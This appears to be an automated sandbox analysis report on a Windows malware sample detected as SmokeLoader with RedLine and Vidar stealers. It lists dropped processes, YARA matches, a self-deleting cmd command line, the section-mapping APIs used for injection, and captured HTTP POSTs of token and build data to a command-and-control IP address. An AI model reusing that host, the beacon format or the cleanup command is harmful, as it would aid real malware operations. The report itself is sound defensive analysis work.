                                                                              Data Ascii: ooAKKKSgYUUUUAJRRRQMKSg0UAFJQaKYwpKWkpAFIaWk/GmMKKKKAEooooASiiigYGkoooGhKKKKBiGiiigYlFFFACUhpaDTGJQaKSgYUlLSUAFJS0lAwpKKKBoSiikNABRRSUFBRRSGgApKDSUFC0lFFMANNoNFAwNJRRQMSkpaKBiUlKaSgYlFFFAxKDR3pKACkpaSgaCkpTSUDEpKWkoGFIaWkoGBpppTRQMSjNFBoGNNLSUUDCk70tJ3oGI
                                                                              2024-05-26 08:23:50 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.45269265.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:51 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------EHJKJDGCGDAKFHIDBGCBCont
                                                                              2024-05-26 08:23:51 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:04:21:53
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\Desktop\4.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\4.exe"
                                                                              Imagebase:0x400000
                                                                              File size:240'128 bytes
                                                                              MD5 hash:73DDF9A7F42E0452B6AA00F4E0A0AFD5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:04:21:58
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff72b770000
                                                                              File size:5'141'208 bytes
                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:5
                                                                              Start time:04:22:21
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Roaming\sdveeeu
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\sdveeeu
                                                                              Imagebase:0x400000
                                                                              File size:240'128 bytes
                                                                              MD5 hash:73DDF9A7F42E0452B6AA00F4E0A0AFD5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 39%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:04:22:31
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Imagebase:0x400000
                                                                              File size:325'120 bytes
                                                                              MD5 hash:EA9DD1EAE2E521666D3F06382104EC10
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:04:23:02
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\9EDA.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\9EDA.exe
                                                                              Imagebase:0x400000
                                                                              File size:2'121'216 bytes
                                                                              MD5 hash:7BDE08F5DD2A433DAE25A8F8B3E70970
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:04:23:05
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Imagebase:0x400000
                                                                              File size:881'664 bytes
                                                                              MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 4%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:04:23:12
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
                                                                              Imagebase:0xde0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:04:23:52
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:04:23:52
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:04:23:52
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:timeout /t 10
                                                                              Imagebase:0x660000
                                                                              File size:25'088 bytes
                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:7.6%
                                                                                Dynamic/Decrypted Code Coverage:43.7%
                                                                                Signature Coverage:40.3%
                                                                                Total number of Nodes:119
                                                                                Total number of Limit Nodes:5
                                                                                execution_graph 3656 402e20 3657 402dd5 3656->3657 3658 402e24 3656->3658 3659 4019e3 15 API calls 3658->3659 3660 403029 3658->3660 3659->3660 3661 401620 3662 401626 3661->3662 3663 4016c6 NtDuplicateObject 3662->3663 3672 4017e2 3662->3672 3664 4016e3 NtCreateSection 3663->3664 3663->3672 3665 401763 NtCreateSection 3664->3665 3666 401709 NtMapViewOfSection 3664->3666 3667 40178f 3665->3667 3665->3672 3666->3665 3668 40172c NtMapViewOfSection 3666->3668 3669 401799 NtMapViewOfSection 3667->3669 3667->3672 3668->3665 3670 40174a 3668->3670 3671 4017c0 NtMapViewOfSection 3669->3671 3669->3672 3670->3665 3671->3672 3554 2dd003c 3555 2dd0049 3554->3555 3567 2dd0e0f SetErrorMode SetErrorMode 3555->3567 3560 2dd0265 3561 2dd02ce VirtualProtect 3560->3561 3563 2dd030b 3561->3563 3562 2dd0439 VirtualFree 3566 2dd04be LoadLibraryA 3562->3566 3563->3562 3565 2dd08c7 3566->3565 3568 2dd0223 3567->3568 3569 2dd0d90 3568->3569 3570 2dd0dad 3569->3570 3571 2dd0dbb GetPEB 3570->3571 3572 2dd0238 VirtualAlloc 3570->3572 3571->3572 3572->3560 3573 2ef192d 3574 2ef193c 3573->3574 3577 2ef20cd 3574->3577 3578 2ef20e8 3577->3578 3579 2ef20f1 CreateToolhelp32Snapshot 3578->3579 3580 2ef210d Module32First 3578->3580 3579->3578 3579->3580 3581 2ef211c 3580->3581 3582 2ef1945 3580->3582 3584 2ef1d8c 3581->3584 3585 2ef1db7 3584->3585 3586 2ef1dc8 VirtualAlloc 3585->3586 3587 2ef1e00 3585->3587 3586->3587 3642 401a09 3643 401a0e 3642->3643 3644 401a2b Sleep 3643->3644 3645 401524 7 API calls 3644->3645 3646 401a46 3645->3646 3647 401615 7 API calls 3646->3647 3648 401a53 3646->3648 3647->3648 3727 4019ee 3728 4019f8 3727->3728 3729 401a2b Sleep 3728->3729 3732 401a53 3728->3732 3730 401524 7 API calls 3729->3730 3731 401a46 3730->3731 3731->3732 3733 401615 7 API calls 3731->3733 3733->3732 3741 2ef191c 3742 2ef192d 3741->3742 3743 2ef20cd 3 API calls 3742->3743 3744 2ef1945 3743->3744 3723 402f74 3724 402f7e 3723->3724 3725 4019e3 15 API calls 3724->3725 3726 403029 3724->3726 3725->3726 3697 2dd0005 3702 2dd092b GetPEB 3697->3702 3699 2dd0030 3704 2dd003c 3699->3704 3703 2dd0972 3702->3703 3703->3699 3705 2dd0049 3704->3705 3706 2dd0e0f 2 API calls 3705->3706 3707 2dd0223 3706->3707 3708 2dd0d90 GetPEB 3707->3708 3709 2dd0238 VirtualAlloc 3708->3709 3710 2dd0265 3709->3710 3711 2dd02ce VirtualProtect 3710->3711 3713 2dd030b 3711->3713 3712 2dd0439 VirtualFree 3716 2dd04be LoadLibraryA 3712->3716 3713->3712 3715 2dd08c7 3716->3715 3588 402f9c 3589 402f8f 3588->3589 3591 403029 3589->3591 3592 4019e3 3589->3592 3593 4019f3 3592->3593 3594 401a2b Sleep 3593->3594 3598 401a53 3593->3598 3599 401524 3594->3599 3596 401a46 3596->3598 3611 401615 3596->3611 3598->3591 3600 401533 3599->3600 3600->3596 3601 4016c6 NtDuplicateObject 3600->3601 3610 4017e2 3600->3610 3602 4016e3 NtCreateSection 3601->3602 3601->3610 3603 401763 NtCreateSection 3602->3603 3604 401709 NtMapViewOfSection 3602->3604 3605 40178f 3603->3605 3603->3610 3604->3603 3606 40172c NtMapViewOfSection 3604->3606 3607 401799 NtMapViewOfSection 3605->3607 3605->3610 3606->3603 3608 40174a 3606->3608 3609 4017c0 NtMapViewOfSection 3607->3609 3607->3610 3608->3603 3609->3610 3610->3596 3612 401626 3611->3612 3613 4016c6 NtDuplicateObject 3612->3613 3622 4017e2 3612->3622 3614 4016e3 NtCreateSection 3613->3614 3613->3622 3615 401763 NtCreateSection 3614->3615 3616 401709 NtMapViewOfSection 3614->3616 3617 40178f 3615->3617 3615->3622 3616->3615 3618 40172c NtMapViewOfSection 3616->3618 3619 401799 NtMapViewOfSection 3617->3619 3617->3622 3618->3615 3620 40174a 3618->3620 3621 4017c0 NtMapViewOfSection 3619->3621 3619->3622 3620->3615 3621->3622 3622->3598 3717 2dd0001 3718 2dd0005 3717->3718 3719 2dd092b GetPEB 3718->3719 3720 2dd0030 3719->3720 3721 2dd003c 7 API calls 3720->3721 3722 2dd0038 3721->3722

                                                                                Executed Functions

                                                                                Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 401524-401556 92 401563-40156c call 4012a9 85->92 97 401593-40159b 92->97 98 40156e-401580 92->98 101 40159d-4015a0 97->101 99 401582-401589 98->99 100 4015fd-401612 98->100 103 401560 99->103 104 40158b-40158d 99->104 102 401639-40165a 100->102 105 4015a2-4015a4 101->105 106 4015e9-4015ef 101->106 114 40165d-401670 call 4012a9 102->114 115 40164e-401656 102->115 103->92 108 401590-401592 104->108 107 4015f7 105->107 109 4015a6-4015c7 105->109 106->107 107->100 108->97 112 401643 109->112 113 4015c9 109->113 112->102 113->108 116 4015cb 113->116 120 401672 114->120 121 401675-40167a 114->121 115->114 116->101 117 4015cd 116->117 117->106 120->121 123 401680-401691 121->123 124 401991-401999 121->124 127 401697-4016c0 123->127 128 40198f-4019e0 call 4012a9 123->128 124->121 127->128 135 4016c6-4016dd NtDuplicateObject 127->135 135->128 138 4016e3-401707 NtCreateSection 135->138 140 401763-401789 NtCreateSection 138->140 141 401709-40172a NtMapViewOfSection 138->141 140->128 143 40178f-401793 140->143 141->140 144 40172c-401748 NtMapViewOfSection 141->144 143->128 145 401799-4017ba NtMapViewOfSection 143->145 144->140 147 40174a-401760 144->147 145->128 149 4017c0-4017dc NtMapViewOfSection 145->149 147->140 149->128 152 4017e2 call 4017e7 149->152
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                                • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                                                • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                                • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65
                                                                                Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 155 401615-40165a 163 40165d-401670 call 4012a9 155->163 164 40164e-401656 155->164 167 401672 163->167 168 401675-40167a 163->168 164->163 167->168 170 401680-401691 168->170 171 401991-401999 168->171 174 401697-4016c0 170->174 175 40198f-4019e0 call 4012a9 170->175 171->168 174->175 182 4016c6-4016dd NtDuplicateObject 174->182 182->175 185 4016e3-401707 NtCreateSection 182->185 187 401763-401789 NtCreateSection 185->187 188 401709-40172a NtMapViewOfSection 185->188 187->175 190 40178f-401793 187->190 188->187 191 40172c-401748 NtMapViewOfSection 188->191 190->175 192 401799-4017ba NtMapViewOfSection 190->192 191->187 194 40174a-401760 191->194 192->175 196 4017c0-4017dc NtMapViewOfSection 192->196 194->187 196->175 199 4017e2 call 4017e7 196->199
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                                • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                                                • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                                • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65
                                                                                Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 202 401635-40165a 206 40165d-401670 call 4012a9 202->206 207 40164e-401656 202->207 210 401672 206->210 211 401675-40167a 206->211 207->206 210->211 213 401680-401691 211->213 214 401991-401999 211->214 217 401697-4016c0 213->217 218 40198f-4019e0 call 4012a9 213->218 214->211 217->218 225 4016c6-4016dd NtDuplicateObject 217->225 225->218 228 4016e3-401707 NtCreateSection 225->228 230 401763-401789 NtCreateSection 228->230 231 401709-40172a NtMapViewOfSection 228->231 230->218 233 40178f-401793 230->233 231->230 234 40172c-401748 NtMapViewOfSection 231->234 233->218 235 401799-4017ba NtMapViewOfSection 233->235 234->230 237 40174a-401760 234->237 235->218 239 4017c0-4017dc NtMapViewOfSection 235->239 237->230 239->218 242 4017e2 call 4017e7 239->242
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                • String ID:
                                                                                • API String ID: 1652636561-0
                                                                                • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                                • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                                                • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                                • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24
                                                                                Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 245 40162d-40165a 251 40165d-401670 call 4012a9 245->251 252 40164e-401656 245->252 255 401672 251->255 256 401675-40167a 251->256 252->251 255->256 258 401680-401691 256->258 259 401991-401999 256->259 262 401697-4016c0 258->262 263 40198f-4019e0 call 4012a9 258->263 259->256 262->263 270 4016c6-4016dd NtDuplicateObject 262->270 270->263 273 4016e3-401707 NtCreateSection 270->273 275 401763-401789 NtCreateSection 273->275 276 401709-40172a NtMapViewOfSection 273->276 275->263 278 40178f-401793 275->278 276->275 279 40172c-401748 NtMapViewOfSection 276->279 278->263 280 401799-4017ba NtMapViewOfSection 278->280 279->275 282 40174a-401760 279->282 280->263 284 4017c0-4017dc NtMapViewOfSection 280->284 282->275 284->263 287 4017e2 call 4017e7 284->287
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                                • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                                                • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                                • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24
                                                                                Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
